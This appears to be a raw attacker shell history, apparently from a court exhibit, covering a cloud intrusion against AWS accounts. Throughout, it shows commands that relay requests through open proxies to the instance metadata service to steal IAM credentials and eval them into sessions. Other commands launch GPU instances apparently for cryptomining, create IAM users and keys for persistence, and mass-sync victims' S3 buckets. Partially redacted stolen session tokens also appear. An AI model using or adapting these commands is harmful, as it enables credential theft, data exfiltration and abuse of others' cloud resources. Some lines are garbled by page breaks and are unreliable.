--cidr 0.0.0.0/0 --region us-west-2
7342  aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-          8109 --associate-public-ip-address --security-group-ids sg-               7023
--instance-initiated-shutdown-behavior terminate --key-name default
7343  aws ec2 authorize-security-group-ingress --group-id sg-              5076 --protocol tcp --port 22
--cidr 0.0.0.0/0 --region us-west-2
7344  aws ec2 run-instances
7345  aws ec2 run-instances --help
7346  aws ec2 run-instances help
7347  aws ec2 describe-subnets
7348  aws ec2 describe-subnets --region us-west-2
7349  aws ec2 create-subnet --region us-west-2
7350  aws ec2 create-subnet --region us-west-2 --vpc-id vpc-             20ae --cidr-block 10.0.0.0/16
7351  aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-          8109 --associate-public-ip-address --security-group-ids sg-               5076
--instance-initiated-shutdown-behavior terminate --key-name default
7352  aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-          8109 --associate-public-ip-address --security-group-ids sg-               5076
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-             5b37
7353  aws ec2 create-key-pair default
7354  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.94.236.99:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/        |
awssession.sh`
7355  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.94.236.99:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/         |
awssession.sh`
7356  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://3.86.119.211:443 http://169.254.169.254/latest/meta-data/iam/security-credentials      |
awssession.sh`
7357  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://18.195.126.53:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh`
7359  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
```

```
https://54.245.71.151:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
    | awssession.sh`
 7360  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.154.221.171:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/            |
awssession.sh`
 7361  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://35.171.245.38:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/            | awssession.sh`
 7362  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.59.31.162:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/ | awssession.sh`
 7363  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.59.31.162:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/            |
awssession.sh`
 7364  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.59.31.162:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/            |
awssession.sh`
 7365  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.239.8.193:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials
 | awssession.sh`
 7366  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.239.8.193:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/            |
awssession.sh`
 7367  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://3.121.222.33:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/            |
awssession.sh`
 7368  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://3.121.222.33:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials
 | awssession.sh`
 7369  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.56.194.127:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
 | awssession.sh`
 7370  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.56.194.127:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/            |
awssession.sh`
 7371  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.14.4.16:8080
http://169.254.169.254/latest/meta-data/iam/security-credentials/       | awssession.sh`
 7372  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.14.4.16:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/         | awssession.sh`
```

```
 7373  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://99.80.218.255:8888 http://169.254.169.254/latest/meta-data/iam/security-credentials/          |
awssession.sh`
 7374  aws ec2 authorize-security-group-ingress --group-id sg-    :8e8 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
 7375  aws ec2 create-key-pair --key-name default --region us-west-2
 7377  aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami             8109 --associate-public-ip-address --security-group-ids sg-     :8e8
--instance-initiated-shutdown-behavior terminate --key-name default
 7378  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.40.32.112:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials
| awssession.sh`
 7379  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.210.6.139:443 http://169.254.169.254/latest/meta-data/iam/security-credentials          |
awssession.sh`
 7380  aws ec2 create-key-pair --key-name default
 7381  aws ec2 describe-security-groups --region eu-west-1
 7382  aws ec2 authorize-security-group-ingress --group-id sg-      )0c8 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-1
 7385  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id
ami             4a80 --associate-public-ip-address --security-group-ids sg-     b0c8
--instance-initiated-shutdown-behavior terminate --key-name default
 7386  aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 2 --image-id
ami             4a80 --associate-public-ip-address --security-group-ids sg-     )0c8
--instance-initiated-shutdown-behavior terminate --key-name default
 7387  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.82.206.182:443 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
 7388  aws ec2 create-key-pair --key-name default --region eu-west-1
 7389  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.208.142.204:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
 7390  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.230.72.193:8118 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
 7391  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.208.169.169:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
 7392  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
```

```
http://54.168.64.184:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
 7393  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.74.132.51:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials          | awssession.sh`
 7397  eval `echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-04-19T05:11:57Z",\n  "Type" :
            ",\n  "AccessKeyId" : "                MFMQ",\n  "SecretAccessKey" :
"                        /1Cy",\n  "Token" :
"AGoJb3JpZ2luX2VjEH0aDmFwLXNvdXRoZWFzdC0xIkgwRgIhALHtoOReWr6UrR3uzGlSOvzcycqPDKW5x1buiIP2LcBXAiEAt9aNjJGjqj
Lmr3jYC1H03dxGr5Dt9QWRmuEEjjoVDcgqyQMIVhABGgw5MzMyMTA2NTgxMDMiDJu37d4+UPde3UY75yqmA3aMkZDVIiioaTCHx27IbUBzM
q1NYidADUUr54FfRkCubBqf0+anq+hkpkIpHGkG//JTctgQL/T50O+65cicvagKU71xht0ecLUZZF38AvN+l4kV4E/Sq9uDqM2ax7gWycaz
ib0UYhqQwhJ8uFNZ+GHVXYk7OOqvCZho5V+nLiZAPn1oTA0NknK/Ci9W9EqlUvAgt2WG3rUDvQmAFV386mkV9e05QniI+A8rg2If1mxn/P8
RPttH9UMRVBqhc+uZxi01qmoHmJ+507I4dbWeggiYWbJ6o6csjs2RCnY0kQ6S1nzC4eBFj83NxRcEALcCu3ZgfrhhZzXGH6dKPTFJhrSDXt
8JNjrSw/AAw/IERzH4N4KVEMK2ks8fwqaTDMgUhxl6Jss0qDjTxNGbXSsRaQs4tcTJngvqC9HUzKMesSl62R+FYGE9OYH+yPlVxPtWzUb86
qiOleYtOI7Miybjc33YMFR0HGJaTeGT4dkU/Zmue9P7ltGmJ3DFQ6rj53wqP9apMERvPMWDkGU+pZnIG30RINPEpklwnDfXN0sd01jV7w6
TopqMP+w5eUFOrMBCMplLVsNAr279ZZCKgYWCHhBEJKJXALeTOHoTuFzrR/9r6qP50xtSgCrF9vTJUWo3xy5XhjoCEYSY+m/39bRHgIKqIR
JMGO6zDEZ1zrqTvv8MZWl9oHNyxb2oZNDiYQG+l/RrPsYJPauSxiiyArmqrv42JcZzdHbtiYvyDCyfEeaM349jiSUd2IBriEj1yrBjijyWx
47BoI717DrKBH7WvXLmZp8FFg9XR1x/QKbVszMsGQ=",\n  "Expiration" : "2019-04-19T11:44:46Z"\n}' | awssession.sh`
 7398  aws ec2 create-key-pair --region us-east-2
 7401  aws ec2 authorize-security-group-ingress --group-id sg-      46fd --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-east-2
 7402  aws ec2 run-instances --region us-east-2 --instance-type p3.16xlarge --count 2 --image-id
ami-        d806 --associate-public-ip-address --security-group-ids sg-      46fd
--instance-initiated-shutdown-behavior terminate --key-name default
 7403  aws ec2 run-instances --region us-east-2 --instance-type p3.8xlarge --count 2 --image-id
ami-        d806 --associate-public-ip-address --security-group-ids sg-      46fd
--instance-initiated-shutdown-behavior terminate --key-name default
 7404  aws ec2 run-instances --region us-east-2 --instance-type p3.2xlarge --count 2 --image-id
ami-        d806 --associate-public-ip-address --security-group-ids sg-      46fd
--instance-initiated-shutdown-behavior terminate --key-name default
 7417  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.237.73.221:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
 7418  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.208.175.152:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
 7419  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.19.223.190:443 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
```

```
 7421  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.19.223.190:443 http://169.254.169.254/latest/meta-data/iam/security-credentials          |
awssession.sh`
 7422  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.154.85.105:443
http://169.254.169.254/latest/meta-data/iam/security-credentials                    | awssession.sh`
 7424  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.154.85.105:443 http://169.254.169.254/latest/meta-data/iam/security-credentials          |
awssession.sh`
 7425  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.50.100.208:443 http://169.254.169.254/latest/meta-data/iam/security-credentials          |
awssession.sh`
 7426  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.54.243.27:44550
http://169.254.169.254/latest/meta-data/iam/security-credentials,                   | awssession.sh`
 7427  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.32.45.175:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials          |
awssession.sh`
 7431  eval `echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-04-19T06:03:31Z",\n  "Type" :
"          ",\n  "AccessKeyId" : "                    TEMZ,\n  "SecretAccessKey" :
"                              bEVq",\n  "Token" :
```

"AgoJb3JpZ2luX2VjEH4aCXVzLXdlc3QtMiJGMEQCIFf4P+TzZ5iUKgzG/BpxHnv5LgGbur9wbs7l1BC4nENRAiAHBkIvCT8EaZlhGfRkAZ VGKu9iBtmYT7DbFOpASi1ZKiraAwhXEAAaDDExNjc5MzUzNDgzNyIMJZn0crlk/POLzHG+KrCDkFcMX7ju28j4jvPIHjxP8+4tH6D2u64oL FAnOo/tOBFwzAMDSzRLkc5eYF0pSfLp8sdPs9u0rpuIxqLGjAij7v0qqw6c1Wi1HUMkSRXfc3mf99ytNUe37wa1dMwTGB4GSoJ9WSgdbwOD oHQqGAFvZAlaVCm3sVXhnUCZ/RAQCYxOpUXNTn2IrzT53UIwy8ZYhRARSgEXcaRiEGcf4d7IgHiChYmt6znwjZ2Sg20aidGw0skYMXWFrnj LlzOdTt3pFSn9bRo5REvQHo9Gsp51Viyhm/Lfr7y4n3latQTZgpGB+gKJfRoNDbK7PzSggB148wnHoLmBJcmyi4XTD9CZnY/G5IX2xAPvp4 FZzZX+FNg0dfO6F2tizOl3eU4K4XemtDG/jQqWn3TvI4tjylZuiCt9kJBbnyAPud0yrY85KRN43jUip3Zho2RTmY9U3NFCS0XKm/EIhWwND zpmMN/Rh0MtzTGIa9Dpl2W9OR6beqWmgBUFXFVNQZplshp2BuTR+q+jfG7ga9ZX+mFv/EbFXxcvgffgSvS+TdkUCKGGqeegqopBv8cZR+Xs zyUgVFnE9/Ha6ZLeIjDJyeXlBTq1ASbBmtg35Fd8yLSJRHJ5DrvGjjIDV/OzyWlDuTaHq/MLI9D7s8nYwT5HIpBkW24ijuOBWTL2S0GQQB+ ViU7/xXGRrRntqBBrKTogb5hWcYwo5bTEwssRqSukLhdHuYsbEMVeACSmWfwQb9+AUdo+yoSVoGzyAd3Td4RZwKsrgisLRQMaHP/+rb20qd y0DrxjLHJfl0hvFJy8Z2SyzmPm3/L2g1gCeKZVPuViylio7mMFXeKpUf4=",\n  "Expiration" : "2019-04-19T12:30:17Z"\n}' |
```
awssession.sh`
 7435  less /home/erratic/awsscan.txt
 7436  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.223.34.247:1080 http://169.254.169.254/latest/meta-data/iam/security-credentials,          |
awssession.sh`
 7439  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.64.4.79:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials          |
awssession.sh`
```

```
 7440  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.248.37.105:8888
http://169.254.169.254/latest/meta-data/iam/security-credentials,          | awssession.sh`
 7441  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.115.38.138:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/           |
awssession.sh`
 7443  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://18.185.4.69:443 http://169.254.169.254/latest/meta-data/iam/security-credentials,
| awssession.sh`
 7444  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.164.114.241:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/           | awssession.sh`
 7445  aws ec2 create-key-pair --key-name default
 7454  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.52.44.117:80
http://169.254.169.254/latest/meta-data/iam/security-credentials,           |
awssession.sh`
 7455  aws ec2 authorize-security-group-ingress --group-id sg-    7431 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
 7456  aws ec2 create-key-pair --region us-west-2 --key-name default
 7459  aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-            3109 --associate-public-ip-address --security-group-ids sg-    c8e8
--instance-initiated-shutdown-behavior terminate --key-name default
 7460  aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-            8109 --associate-public-ip-address --security-group-ids sg-    7431
--instance-initiated-shutdown-behavior terminate --key-name default
 7461  aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami-            8109 --associate-public-ip-address --security-group-ids sg-    7431
--instance-initiated-shutdown-behavior terminate --key-name default
 7462  aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 2 --image-id
ami-            8109 --associate-public-ip-address --security-group-ids sg-    7431
--instance-initiated-shutdown-behavior terminate --key-name default
 7463  aws ec2 describe-instances --region us-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
 7475  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.67.90.165:443 http://169.254.169.254/latest/meta-data/iam/security-credentials,           |
awssession.sh`
 7479  aws ec2 authorize-security-group-ingress --group-id sg-    5404 --protocol tcp --port 22 --cidr
```

608-056

```
0.0.0.0/0 --region us-east-2
 7480  aws ec2 run-instances --region us-east-2 --instance-type p3.16xlarge --count 2 --image-id
ami            d806 --associate-public-ip-address --security-group-ids sg-    5404
--instance-initiated-shutdown-behavior terminate --key-name default
 7481  aws ec2 run-instances --region us-east-2 --instance-type p3.8xlarge --count 2 --image-id
ami            d806 --associate-public-ip-address --security-group-ids sg-    5404
--instance-initiated-shutdown-behavior terminate --key-name default
 7482  aws ec2 run-instances --region us-east-2 --instance-type p3.2xlarge --count 2 --image-id
ami            d806 --associate-public-ip-address --security-group-ids sg-    5404
--instance-initiated-shutdown-behavior terminate --key-name default
 7495  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.30.163.228:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/            |
awssession.sh`
 7496  aws ec2 describe-instances eu-west-1
 7497  aws ec2 describe-instances --region eu-west-1
 7498  aws ec2 describe-instances --region us-east-2
 7499  aws ec2 create-key-pair --region us-east-2 --key-name default
 7502  aws ec2 describe-security-groups --region us-east-2
 7503  aws ec2 authorize-security-group-ingress --group-id sg-    f45c --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-east-2
 7504  aws ec2 run-instances --region us-east-2 --instance-type p3.16xlarge --count 2 --image-id
ami              5d806 --associate-public-ip-address --security-group-ids sg-    f45c
--instance-initiated-shutdown-behavior terminate --key-name default
 7505  aws ec2 run-instances --region us-east-2 --instance-type p3.8xlarge --count 2 --image-id
ami           d806 --associate-public-ip-address --security-group-ids sg   f45c
--instance-initiated-shutdown-behavior terminate --key-name default
 7506  aws ec2 run-instances --region us-east-2 --instance-type p3.2xlarge --count 2 --image-id
ami           d806 --associate-public-ip-address --security-group-ids sg-    f45c
--instance-initiated-shutdown-behavior terminate --key-name default
 7507  aws ec2 describe-instances --region us-east-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
 7605  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.79.116.117:3128 http://169.254.169.254/latest/meta-data/iam/security-credentials            |
awssession.sh`
 7606  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.79.116.117:3128 http://169.254.169.254/latest/meta-data/iam/security-credentials            |
awssession.sh`
 7607  aws iam create-user
 7608  aws iam create-user --user-name default
```

```
7609  aws iam list-groups
7610  aws iam list-user-policy
7611  aws iam list-user-policies
7612  aws iam list-user-policies --user-name
7613  aws iam list-user-policies --user-name
7614  aws iam list-user-policies --user-name
7615  aws iam create-access-key
7616  aws iam create-access-key --user-name default
7617  aws iam attach-user-policy --user-name default --policy-arn
arn:aws:iam::aws:
7618  aws iam list-policies
7619  aws iam list-policies | less
7620  aws iam attach-user-policy --user-name default --policy-arn
"arn:aws:iam::aws:
7621  aws iam list-user-policies --user-name default
7622  aws iam put-user-policy
7626  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.215.118.42:443
http://169.254.169.254/latest/meta-data/iam/security-credentials,                    |
awssession.sh`
7627  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.113.12.133:80 http://169.254.169.254/latest/meta-data/iam/security-credentials            |
awssession.sh`
7628  aws iam put-user-policy --user-name default --policy-name
file:/,
7629  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.254.186.54:443 http://169.254.169.254/latest/meta-data/iam/security-credentials,            |
awssession.sh`
7630  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.154.89.46:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                    |
awssession.sh`
7631  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.17.209.16:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/sec_                | awssession.sh`
7632  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.199.172.190:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh`
7633  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
```

```
      https://52.213.150.35:443
      http://169.254.169.254/latest/meta-data/iam/security-credentials/                    |
      awssession.sh`
  7634  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
      http://34.250.209.203:80
      http://169.254.169.254/latest/meta-data/iam/security-credentials/                    | awssession.sh`
  7635  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
      https://18.208.62.195:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/           |
      awssession.sh`
  7636  aws iam create-user --user-name default
  7637  aws iam create-access-key --user-name default\n
  7638  aws iam put-user-policy --user-name default --
      file:///mnt/
  7639  aws iam list-users
  7640  aws --profile              iam list-users
  7641  nano ~/.aws/credentials
  7642  aws --profile              iam list-users
  7643  aws --profile              iam list-buckets
  7644  aws --profile              s3api list-buckets
  7645  aws
  7646  aws                describe-account
  7647  aws                describe-organization
  7648  aws        describe-organization
  7649  aws --profile                 describe-organization
  7650  aws --profile              organizations describe-organization
  7651  aws --profile        organizations describe-organization
  7652  aws --profile                   s3api list-buckets
  7653  aws            s3api list-buckets
  7654  aws --profile           s3api list-buckets
  7734  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
      select(.service == "S3")
  7735  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
      select(.service == "S3")'
  7736  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
      select(.service == "EC2") | "\"" + .ip_prefix + "\", "'  | tr '\n' ' '
  7737  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
      select(.service == "33") | "\"" + .ip_prefix + "\", "'
  7738  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
      select(.service == "S3") | "\"" + .ip_prefix + "\", "'
```

```
 7739  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "S3") |  .ip_prefix '
 7744  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "S3") |  .ip_prefix ' | parallel ./spools3.sh {}
 7762  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://35.156.78.99:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/▒▒▒▒▒ |
awssession.sh`
 7763  aws ec2 describe-instances --region us-east-1
 7764  aws ec2 describe-security-groups --region us-east-2
 7765  aws ec2 describe-security-groups --region us-west-2
 7766  aws ec2 describe-security-groups --region eu-west-2
 7768  cd aws_scan/miner
 7799  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://35.162.65.136:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/▒▒▒▒▒▒ |
awssession.sh`
 7955  cat aws_scan/scan_for_metadata.sh
 8054  cat ~/aws_scan/scan_for_metadata.sh
 8055  cat ~/aws_scan/prescan.sh
 8205  cp ../aws_scan/new_all.xz .
 8226  eval `curl --fail -L -k -s --proxy-insecure --proxy http://13.209.82.3:8008
http://169.254.169.254/latest/meta-data/iam/security-credentials▒▒▒▒▒ | awssession.sh`
 8229  eval `curl --fail -L -k -s --proxy-insecure --proxy http://18.231.118.35:9050
http://169.254.169.254/latest/meta-data/iam/security-credentials/▒▒▒▒ | awssession.sh`
 8232  eval curl --fail -L -k -s --proxy-insecure --proxy http://18.231.118.35:9050
http://169.254.169.254/latest/meta-data/iam/security-credentials,▒▒▒ | awssession.sh`
 8233  eval `curl --fail -L -k -s --proxy-insecure --proxy http://18.231.118.35:9050
http://169.254.169.254/latest/meta-data/iam/security-credentials,▒▒▒▒ | awssession.sh`
 8236  eval `curl --fail -L -k -s --proxy-insecure --proxy https://63.32.127.100:443
http://169.254.169.254/latest/meta-data/iam/security-credentials,▒▒▒▒▒▒▒▒ |
awssession.sh`
 8237  aws s3 list-buckets
 8239  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='▒▒▒▒▒▒▒▒' \;
mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws
 8240  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='▒▒▒▒▒▒▒▒' \;
mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync {} .
 8241  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='▒▒▒▒▒▒▒▒' \;
mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
 8278  cp ../aws_scan/spool.sh .
 8398  aws ec2 describe-instances --region eu-west-2
```

```
8399   aws ec2 describe-instances --region eu-north-1
8400   aws ec2 describe-instances --region ap-north-1 --profile
8401   aws ec2 describe-instances --region eu-north-1 --profile
8402   aws ec2 describe-instances --region eu-north-1 --profile
8403   aws ec2 describe-instances --region eu-north-1 --profile
8404   aws ec2 describe-instances --region eu-north-1 --profile
8406   aws ec2 describe-instances --profile
8407   aws ec2 reboot-instances --profile              --region eu-north-1 --instance-ids
i-                d2ea
8436   aws ec2 describe-instances --profile              --region eu-north-1
8500   aws --profile         --region us-west-2        describe-instances
8501   aws --profile         --region us-west-2             get-account-limit
8502   aws --profile         --region us-west-2             register-domain
8526   curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy http://13.124.194.79:8888
http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh
8527   eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://13.124.194.79:8888 http://169.254.169.254/latest/meta-data/iam/security-credentials/               |
awssession.sh`
8528   for x in $(cat iam.txt); do\neval `$x | awssession.sh`;\naws ec2 describe-key-pairs\ndone
8529   for x in $(cat iam.txt); do\neval `./$x | awssession.sh`;\naws ec2 describe-key-pairs\ndone
8530   for x in $(cat iam.txt); do\neval `exec $x | awssession.sh`;\naws ec2 describe-key-pairs\ndone
8531   nano ../aws_scan/n
8544   aws ec2 describe-key-pairs
8548   curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy http://13.211.238.144:4455
http://169.254.169.254/latest/meta-data/iam/security-credentials,           | awssession.sh
8549   aws sts get-caller-identity --verbose
8550   aws --help
8553   curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy https://63.32.127.100:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                      |
awssession.sh
8554   aws --debug sts get-caller-identity
8558   nano ~/.aws/config
8559   cd ~/.aws
8560   mv .aws .aws.bak
8561   aws help
8562   aws --no-sign-request        get-caller-identity
8563   aws        get-caller-identity --region ap-southeast-2
8565   eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://13.211.238.144:4455 http://169.254.169.254/latest/meta-data/iam/security-credentials/          |
```

```
      awssession.sh`
 8566  eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
https://63.32.127.100:443
http://169.254.169.254/latest/meta-data/iam/security-credentials,              |
awssession.sh`
 8641  eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://35.157.236.93:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials        |
awssession.sh`
 8642  eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://35.157.236.93:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials
               | awssession.sh`
 8643  aws ec2 describe-instances
 8646  eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://52.52.27.18:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
 8647  eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://52.52.27.18:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
               | awssession.sh`
 8649  eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
